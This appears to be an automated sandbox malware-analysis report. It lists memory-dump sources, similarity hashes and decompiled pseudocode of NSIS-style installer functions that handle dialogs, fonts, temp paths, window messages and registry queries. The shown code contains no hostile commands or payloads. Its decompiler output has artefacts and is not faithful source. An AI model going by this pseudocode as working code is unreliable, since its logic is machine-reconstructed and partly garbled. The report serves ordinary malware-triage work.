                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.210091927.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.210082002.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210106552.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210112543.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210125931.000000000041D000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210140602.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210144999.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210150471.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: CloseEnum$DeleteValue
                                                          • String ID:
                                                          • API String ID: 1354259210-0
                                                          • Opcode ID: 681fed8778fb2982ecb5527b851c998c3744aa6ef2e2e43ab789fcfdd1fcd395
                                                          • Instruction ID: d75478e88f471254037528958efdeb905634950da4f4823c7bb408bf4a1a64a1
                                                          • Opcode Fuzzy Hash: 681fed8778fb2982ecb5527b851c998c3744aa6ef2e2e43ab789fcfdd1fcd395
                                                          • Instruction Fuzzy Hash: 44215771900108BBEF129F90CE89EEE7A7DEF44344F100476FA55B11A0E7B48E54AA68
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 77%
                                                          			E00401D65(void* __ebx, void* __edx) {
                                                          				struct HWND__* _t30;
                                                          				CHAR* _t38;
                                                          				void* _t48;
                                                          				void* _t53;
                                                          				signed int _t55;
                                                          				signed int _t58;
                                                          				long _t61;
                                                          				void* _t65;
                                                          
                                                          				_t53 = __ebx;
                                                          				if(( *(_t65 - 0x1b) & 0x00000001) == 0) {
                                                          					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x20));
                                                          				} else {
                                                          					E00402BAC(2);
                                                          					 *((intOrPtr*)(__ebp - 0x38)) = __edx;
                                                          				}
                                                          				_t55 =  *(_t65 - 0x1c);
                                                          				 *(_t65 + 8) = _t30;
                                                          				_t58 = _t55 & 0x00000004;
                                                          				 *(_t65 - 0xc) = _t55 & 0x00000003;
                                                          				 *(_t65 - 0x34) = _t55 >> 0x1f;
                                                          				 *(_t65 - 0x30) = _t55 >> 0x0000001e & 0x00000001;
                                                          				if((_t55 & 0x00010000) == 0) {
                                                          					_t38 =  *(_t65 - 0x24) & 0x0000ffff;
                                                          				} else {
                                                          					_t38 = E00402BCE(0x11);
                                                          				}
                                                          				 *(_t65 - 8) = _t38;
                                                          				GetClientRect( *(_t65 + 8), _t65 - 0x84);
                                                          				asm("sbb edi, edi");
                                                          				_t61 = LoadImageA( ~_t58 &  *0x42f440,  *(_t65 - 8),  *(_t65 - 0xc),  *(_t65 - 0x7c) *  *(_t65 - 0x34),  *(_t65 - 0x78) *  *(_t65 - 0x30),  *(_t65 - 0x1c) & 0x0000fef0);
                                                          				_t48 = SendMessageA( *(_t65 + 8), 0x172,  *(_t65 - 0xc), _t61);
                                                          				if(_t48 != _t53 &&  *(_t65 - 0xc) == _t53) {
                                                          					DeleteObject(_t48);
                                                          				}
                                                          				if( *((intOrPtr*)(_t65 - 0x28)) >= _t53) {
                                                          					_push(_t61);
                                                          					E004061AB();
                                                          				}
                                                          				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t65 - 4));
                                                          				return 0;
                                                          			}











                                                          0x00401d65
                                                          0x00401d69
                                                          0x00401d7e
                                                          0x00401d6b
                                                          0x00401d6d
                                                          0x00401d73
                                                          0x00401d73
                                                          0x00401d84
                                                          0x00401d87
                                                          0x00401d91
                                                          0x00401d94
                                                          0x00401d9c
                                                          0x00401dad
                                                          0x00401db0
                                                          0x00401dbb
                                                          0x00401db2
                                                          0x00401db4
                                                          0x00401db4
                                                          0x00401dbf
                                                          0x00401dcc
                                                          0x00401df3
                                                          0x00401e02
                                                          0x00401e10
                                                          0x00401e18
                                                          0x00401e20
                                                          0x00401e20
                                                          0x00401e29
                                                          0x00401e2f
                                                          0x004029a5
                                                          0x004029a5
                                                          0x00402a5d
                                                          0x00402a69

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.210091927.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.210082002.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210106552.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210112543.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210125931.000000000041D000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210140602.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210144999.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210150471.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                          • String ID:
                                                          • API String ID: 1849352358-0
                                                          • Opcode ID: 9d39b7960c4b589ca11e41561aab3825f23cbdbd0ce465e9420b3b3e566fd9b2
                                                          • Instruction ID: af2208a9c993d9ce4f8579721101e2d802b93c806783de9e53f89228710c5587
                                                          • Opcode Fuzzy Hash: 9d39b7960c4b589ca11e41561aab3825f23cbdbd0ce465e9420b3b3e566fd9b2
                                                          • Instruction Fuzzy Hash: EA212A72E00109AFCF15DFA4DD85AAEBBB5EB48304F24407EF901F62A1CB389951DB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 73%
                                                          			E00401E35(intOrPtr __edx) {
                                                          				void* __esi;
                                                          				int _t9;
                                                          				signed char _t15;
                                                          				struct HFONT__* _t18;
                                                          				intOrPtr _t30;
                                                          				struct HDC__* _t31;
                                                          				void* _t33;
                                                          				void* _t35;
                                                          
                                                          				_t30 = __edx;
                                                          				_t31 = GetDC( *(_t35 - 8));
                                                          				_t9 = E00402BAC(2);
                                                          				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
                                                          				0x40b850->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
                                                          				ReleaseDC( *(_t35 - 8), _t31);
                                                          				 *0x40b860 = E00402BAC(3);
                                                          				_t15 =  *((intOrPtr*)(_t35 - 0x18));
                                                          				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
                                                          				 *0x40b867 = 1;
                                                          				 *0x40b864 = _t15 & 0x00000001;
                                                          				 *0x40b865 = _t15 & 0x00000002;
                                                          				 *0x40b866 = _t15 & 0x00000004;
                                                          				E004062E0(_t9, _t31, _t33, 0x40b86c,  *((intOrPtr*)(_t35 - 0x24)));
                                                          				_t18 = CreateFontIndirectA(0x40b850);
                                                          				_push(_t18);
                                                          				_push(_t33);
                                                          				E004061AB();
                                                          				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t35 - 4));
                                                          				return 0;
                                                          			}











                                                          0x00401e35
                                                          0x00401e40
                                                          0x00401e42
                                                          0x00401e4f
                                                          0x00401e66
                                                          0x00401e6b
                                                          0x00401e78
                                                          0x00401e7d
                                                          0x00401e81
                                                          0x00401e8c
                                                          0x00401e93
                                                          0x00401ea5
                                                          0x00401eab
                                                          0x00401eb0
                                                          0x00401eba
                                                          0x00402620
                                                          0x00401569
                                                          0x004029a5
                                                          0x00402a5d
                                                          0x00402a69

                                                          APIs
                                                          • GetDC.USER32(?), ref: 00401E38
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
                                                          • ReleaseDC.USER32 ref: 00401E6B
                                                          • CreateFontIndirectA.GDI32(0040B850), ref: 00401EBA
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.210091927.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.210082002.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210106552.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210112543.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210125931.000000000041D000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210140602.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210144999.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210150471.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                          • String ID:
                                                          • API String ID: 3808545654-0
                                                          • Opcode ID: d1cbb2668a8e0048c904ace968a64d6fe2784e3b1926127080350a50dd5622c8
                                                          • Instruction ID: bda7ea4a963eadc9936f181c2ed760bd7850ebe674c1e58b805f7706cadb7525
                                                          • Opcode Fuzzy Hash: d1cbb2668a8e0048c904ace968a64d6fe2784e3b1926127080350a50dd5622c8
                                                          • Instruction Fuzzy Hash: A3016D72504248AEE7007BB1AE4AA9A3FF8E755301F10887AF141B61F2CB7804458B6C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 77%
                                                          			E00404B1A(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                          				char _v36;
                                                          				char _v68;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t21;
                                                          				signed int _t22;
                                                          				void* _t29;
                                                          				void* _t31;
                                                          				void* _t32;
                                                          				void* _t41;
                                                          				signed int _t43;
                                                          				signed int _t47;
                                                          				signed int _t50;
                                                          				signed int _t51;
                                                          				signed int _t53;
                                                          
                                                          				_t21 = _a16;
                                                          				_t51 = _a12;
                                                          				_t41 = 0xffffffdc;
                                                          				if(_t21 == 0) {
                                                          					_push(0x14);
                                                          					_pop(0);
                                                          					_t22 = _t51;
                                                          					if(_t51 < 0x100000) {
                                                          						_push(0xa);
                                                          						_pop(0);
                                                          						_t41 = 0xffffffdd;
                                                          					}
                                                          					if(_t51 < 0x400) {
                                                          						_t41 = 0xffffffde;
                                                          					}
                                                          					if(_t51 < 0xffff3333) {
                                                          						_t50 = 0x14;
                                                          						asm("cdq");
                                                          						_t22 = 1 / _t50 + _t51;
                                                          					}
                                                          					_t23 = _t22 & 0x00ffffff;
                                                          					_t53 = _t22 >> 0;
                                                          					_t43 = 0xa;
                                                          					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
                                                          				} else {
                                                          					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
                                                          					_t47 = 0;
                                                          				}
                                                          				_t29 = E004062E0(_t41, _t47, _t53,  &_v36, 0xffffffdf);
                                                          				_t31 = E004062E0(_t41, _t47, _t53,  &_v68, _t41);
                                                          				_t32 = E004062E0(_t41, _t47, 0x42a8b8, 0x42a8b8, _a8);
                                                          				wsprintfA(_t32 + lstrlenA(0x42a8b8), "%u.%u%s%s", _t53, _t47, _t31, _t29);
                                                          				return SetDlgItemTextA( *0x42ec18, _a4, 0x42a8b8);
                                                          			}



















                                                          0x00404b20
                                                          0x00404b25
                                                          0x00404b2d
                                                          0x00404b2e
                                                          0x00404b3b
                                                          0x00404b43
                                                          0x00404b44
                                                          0x00404b46
                                                          0x00404b48
                                                          0x00404b4a
                                                          0x00404b4d
                                                          0x00404b4d
                                                          0x00404b54
                                                          0x00404b5a
                                                          0x00404b5a
                                                          0x00404b61
                                                          0x00404b68
                                                          0x00404b6b
                                                          0x00404b6e
                                                          0x00404b6e
                                                          0x00404b72
                                                          0x00404b82
                                                          0x00404b84
                                                          0x00404b87
                                                          0x00404b30
                                                          0x00404b30
                                                          0x00404b37
                                                          0x00404b37
                                                          0x00404b8f
                                                          0x00404b9a
                                                          0x00404bb0
                                                          0x00404bc0
                                                          0x00404bdc

                                                          APIs
                                                          • lstrlenA.KERNEL32(0042A8B8,0042A8B8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A35,000000DF,00000000,00000400,?), ref: 00404BB8
                                                          • wsprintfA.USER32 ref: 00404BC0
                                                          • SetDlgItemTextA.USER32 ref: 00404BD3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.210091927.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.210082002.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210106552.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210112543.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210125931.000000000041D000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210140602.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210144999.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210150471.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: ItemTextlstrlenwsprintf
                                                          • String ID: %u.%u%s%s
                                                          • API String ID: 3540041739-3551169577
                                                          • Opcode ID: 08f9c178ad4fdce5ba5a134203cc09d67d66b4423bbb0e6013138279e3fed682
                                                          • Instruction ID: 2e00c39cbbb7080f6c78f9bc89fda30cce30f66f6b884b1aab771d4f97bc656b
                                                          • Opcode Fuzzy Hash: 08f9c178ad4fdce5ba5a134203cc09d67d66b4423bbb0e6013138279e3fed682
                                                          • Instruction Fuzzy Hash: 9111B7736041282BDB00656D9C42FAE3298DB85374F25027BFA26F71D1EA79DC2242ED
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 59%
                                                          			E00401C2E(intOrPtr __edx) {
                                                          				int _t29;
                                                          				long _t30;
                                                          				signed int _t32;
                                                          				CHAR* _t35;
                                                          				long _t36;
                                                          				int _t41;
                                                          				signed int _t42;
                                                          				int _t46;
                                                          				int _t56;
                                                          				intOrPtr _t57;
                                                          				struct HWND__* _t61;
                                                          				void* _t64;
                                                          
                                                          				_t57 = __edx;
                                                          				_t29 = E00402BAC(3);
                                                          				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                          				 *(_t64 - 8) = _t29;
                                                          				_t30 = E00402BAC(4);
                                                          				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                          				 *(_t64 + 8) = _t30;
                                                          				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
                                                          					 *((intOrPtr*)(__ebp - 8)) = E00402BCE(0x33);
                                                          				}
                                                          				__eflags =  *(_t64 - 0x14) & 0x00000002;
                                                          				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
                                                          					 *(_t64 + 8) = E00402BCE(0x44);
                                                          				}
                                                          				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
                                                          				_push(1);
                                                          				if(__eflags != 0) {
                                                          					_t59 = E00402BCE();
                                                          					_t32 = E00402BCE();
                                                          					asm("sbb ecx, ecx");
                                                          					asm("sbb eax, eax");
                                                          					_t35 =  ~( *_t31) & _t59;
                                                          					__eflags = _t35;
                                                          					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                                                          					goto L10;
                                                          				} else {
                                                          					_t61 = E00402BAC();
                                                          					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                          					_t41 = E00402BAC(2);
                                                          					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                          					_t56 =  *(_t64 - 0x14) >> 2;
                                                          					if(__eflags == 0) {
                                                          						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
                                                          						L10:
                                                          						 *(_t64 - 0xc) = _t36;
                                                          					} else {
                                                          						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
                                                          						asm("sbb eax, eax");
                                                          						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                                          					}
                                                          				}
                                                          				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
                                                          				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
                                                          					_push( *(_t64 - 0xc));
                                                          					E004061AB();
                                                          				}
                                                          				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t64 - 4));
                                                          				return 0;
                                                          			}















                                                          0x00401c2e
                                                          0x00401c30
                                                          0x00401c37
                                                          0x00401c3a
                                                          0x00401c3d
                                                          0x00401c47
                                                          0x00401c4b
                                                          0x00401c4e
                                                          0x00401c57
                                                          0x00401c57
                                                          0x00401c5a
                                                          0x00401c5e
                                                          0x00401c67
                                                          0x00401c67
                                                          0x00401c6a
                                                          0x00401c6e
                                                          0x00401c70
                                                          0x00401cc5
                                                          0x00401cc7
                                                          0x00401cd0
                                                          0x00401cd8
                                                          0x00401cdb
                                                          0x00401cdb
                                                          0x00401ce4
                                                          0x00000000
                                                          0x00401c72
                                                          0x00401c79
                                                          0x00401c7b
                                                          0x00401c7e
                                                          0x00401c84
                                                          0x00401c8b
                                                          0x00401c8e
                                                          0x00401cb6
                                                          0x00401cea
                                                          0x00401cea
                                                          0x00401c90
                                                          0x00401c9e
                                                          0x00401ca6
                                                          0x00401ca9
                                                          0x00401ca9
                                                          0x00401c8e
                                                          0x00401ced
                                                          0x00401cf0
                                                          0x00401cf6
                                                          0x004029a5
                                                          0x004029a5
                                                          0x00402a5d
                                                          0x00402a69

                                                          APIs
                                                          • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                                          • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CB6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.210091927.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.210082002.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210106552.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210112543.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210125931.000000000041D000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210140602.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210144999.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210150471.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: MessageSend$Timeout
                                                          • String ID: !
                                                          • API String ID: 1777923405-2657877971
                                                          • Opcode ID: 7f513ab6a3ebb62765d7b61154200c887099e4f9fcc296ff57337de7f7cd59e8
                                                          • Instruction ID: c2b49ebb6df65f965b847d27db55c839bb0ece9d55d01ae65463d35699866107
                                                          • Opcode Fuzzy Hash: 7f513ab6a3ebb62765d7b61154200c887099e4f9fcc296ff57337de7f7cd59e8
                                                          • Instruction Fuzzy Hash: 1B215E71A44208BEEB05AFB5D98AAAD7FB5EF44304F20447EF502B61D1D6B88541DB28
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00405BE5(CHAR* _a4) {
                                                          				CHAR* _t7;
                                                          
                                                          				_t7 = _a4;
                                                          				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                                                          					lstrcatA(_t7, 0x40a014);
                                                          				}
                                                          				return _t7;
                                                          			}




                                                          0x00405be6
                                                          0x00405bfd
                                                          0x00405c05
                                                          0x00405c05
                                                          0x00405c0d

                                                          APIs
                                                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403473,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00405BEB
                                                          • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403473,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00405BF4
                                                          • lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405C05
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BE5
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.210091927.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.210082002.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210106552.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210112543.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210125931.000000000041D000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210140602.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210144999.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210150471.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: CharPrevlstrcatlstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 2659869361-3916508600
                                                          • Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                          • Instruction ID: 4aa12e920610aceb8e029670fdf9df43119f1a02786e7ce54b96f7a39d5643bc
                                                          • Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                          • Instruction Fuzzy Hash: E3D0A762A09630BAD20136655C09DCB19088F12701B05006BF101B2191C73C4C5147FD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E0040396E() {
                                                          				void* _t1;
                                                          				void* _t2;
                                                          				signed int _t11;
                                                          
                                                          				_t1 =  *0x40a018; // 0x2d4
                                                          				if(_t1 != 0xffffffff) {
                                                          					CloseHandle(_t1);
                                                          					 *0x40a018 =  *0x40a018 | 0xffffffff;
                                                          				}
                                                          				_t2 =  *0x40a01c; // 0x2cc
                                                          				if(_t2 != 0xffffffff) {
                                                          					CloseHandle(_t2);
                                                          					 *0x40a01c =  *0x40a01c | 0xffffffff;
                                                          					_t11 =  *0x40a01c;
                                                          				}
                                                          				E004039CB();
                                                          				return E00405A15(_t11, "C:\\Users\\hardz\\AppData\\Local\\Temp\\nsaBD32.tmp", 7);
                                                          			}






                                                          0x0040396e
                                                          0x0040397d
                                                          0x00403980
                                                          0x00403982
                                                          0x00403982
                                                          0x00403989
                                                          0x00403991
                                                          0x00403994
                                                          0x00403996
                                                          0x00403996
                                                          0x00403996
                                                          0x0040399d
                                                          0x004039af

                                                          APIs
                                                          • CloseHandle.KERNEL32(000002D4,C:\Users\user\AppData\Local\Temp\,004037A5,?,?,00000007,00000009,0000000B), ref: 00403980
                                                          • CloseHandle.KERNEL32(000002CC,C:\Users\user\AppData\Local\Temp\,004037A5,?,?,00000007,00000009,0000000B), ref: 00403994
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403973
                                                          • C:\Users\user\AppData\Local\Temp\nsaBD32.tmp, xrefs: 004039A4
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.210091927.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.210082002.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210106552.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210112543.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210125931.000000000041D000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210140602.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210144999.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210150471.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: CloseHandle
                                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsaBD32.tmp
                                                          • API String ID: 2962429428-1846748667
                                                          • Opcode ID: 9c3bbf5256d3b09d74f88582b30b225da325b648228e2b1124762f0c8a79aaf4
                                                          • Instruction ID: e02401a4112a94a9765f7fc85388a0ec9ec9dd0d4867be743f4f38008bc29606
                                                          • Opcode Fuzzy Hash: 9c3bbf5256d3b09d74f88582b30b225da325b648228e2b1124762f0c8a79aaf4
                                                          • Instruction Fuzzy Hash: 36E08C71910714A6C124AF7CAE8E8853B285B893357208726F078F20F0C7789AA74EAD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 89%
                                                          			E004052E8(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                          				int _t15;
                                                          				long _t16;
                                                          
                                                          				_t15 = _a8;
                                                          				if(_t15 != 0x102) {
                                                          					if(_t15 != 0x200) {
                                                          						_t16 = _a16;
                                                          						L7:
                                                          						if(_t15 == 0x419 &&  *0x42a8a4 != _t16) {
                                                          							_push(_t16);
                                                          							_push(6);
                                                          							 *0x42a8a4 = _t16;
                                                          							E00404CA4();
                                                          						}
                                                          						L11:
                                                          						return CallWindowProcA( *0x42a8ac, _a4, _t15, _a12, _t16);
                                                          					}
                                                          					if(IsWindowVisible(_a4) == 0) {
                                                          						L10:
                                                          						_t16 = _a16;
                                                          						goto L11;
                                                          					}
                                                          					_t16 = E00404C24(_a4, 1);
                                                          					_t15 = 0x419;
                                                          					goto L7;
                                                          				}
                                                          				if(_a12 != 0x20) {
                                                          					goto L10;
                                                          				}
                                                          				E0040431D(0x413);
                                                          				return 0;
                                                          			}





                                                          0x004052ec
                                                          0x004052f6
                                                          0x00405312
                                                          0x00405334
                                                          0x00405337
                                                          0x0040533d
                                                          0x00405347
                                                          0x00405348
                                                          0x0040534a
                                                          0x00405350
                                                          0x00405350
                                                          0x0040535a
                                                          0x00000000
                                                          0x00405368
                                                          0x0040531f
                                                          0x00405357
                                                          0x00405357
                                                          0x00000000
                                                          0x00405357
                                                          0x0040532b
                                                          0x0040532d
                                                          0x00000000
                                                          0x0040532d
                                                          0x004052fc
                                                          0x00000000
                                                          0x00000000
                                                          0x00405303
                                                          0x00000000

                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 00405317
                                                          • CallWindowProcA.USER32 ref: 00405368
                                                            • Part of subcall function 0040431D: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 0040432F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.210091927.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.210082002.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210106552.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210112543.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210125931.000000000041D000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210140602.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210144999.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210150471.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: Window$CallMessageProcSendVisible
                                                          • String ID:
                                                          • API String ID: 3748168415-3916222277
                                                          • Opcode ID: 0a098fed05280c4c25b3dc975a767402e9790e492dc4fcfe2bcc4ad60f2532f9
                                                          • Instruction ID: 61c005e653dc5e4fe91c717b668e6c159ed787b7c92b66bd7724375ff0c78d11
                                                          • Opcode Fuzzy Hash: 0a098fed05280c4c25b3dc975a767402e9790e492dc4fcfe2bcc4ad60f2532f9
                                                          • Instruction Fuzzy Hash: B5018471200608EFDF206F11DD80AAB3765EB84795F185137FE047A1D1C7BA8C629E2E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 90%
                                                          			E00406134(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
                                                          				int _v8;
                                                          				long _t21;
                                                          				long _t24;
                                                          				char* _t30;
                                                          
                                                          				asm("sbb eax, eax");
                                                          				_v8 = 0x400;
                                                          				_t21 = E004060D3(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                                                          				_t30 = _a16;
                                                          				if(_t21 != 0) {
                                                          					L4:
                                                          					 *_t30 =  *_t30 & 0x00000000;
                                                          				} else {
                                                          					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                                                          					_t21 = RegCloseKey(_a20);
                                                          					_t30[0x3ff] = _t30[0x3ff] & 0x00000000;
                                                          					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                                          						goto L4;
                                                          					}
                                                          				}
                                                          				return _t21;
                                                          			}







                                                          0x00406142
                                                          0x00406144
                                                          0x0040615c
                                                          0x00406161
                                                          0x00406166
                                                          0x004061a3
                                                          0x004061a3
                                                          0x00406168
                                                          0x0040617a
                                                          0x00406185
                                                          0x0040618b
                                                          0x00406195
                                                          0x00000000
                                                          0x00000000
                                                          0x00406195
                                                          0x004061a8

                                                          APIs
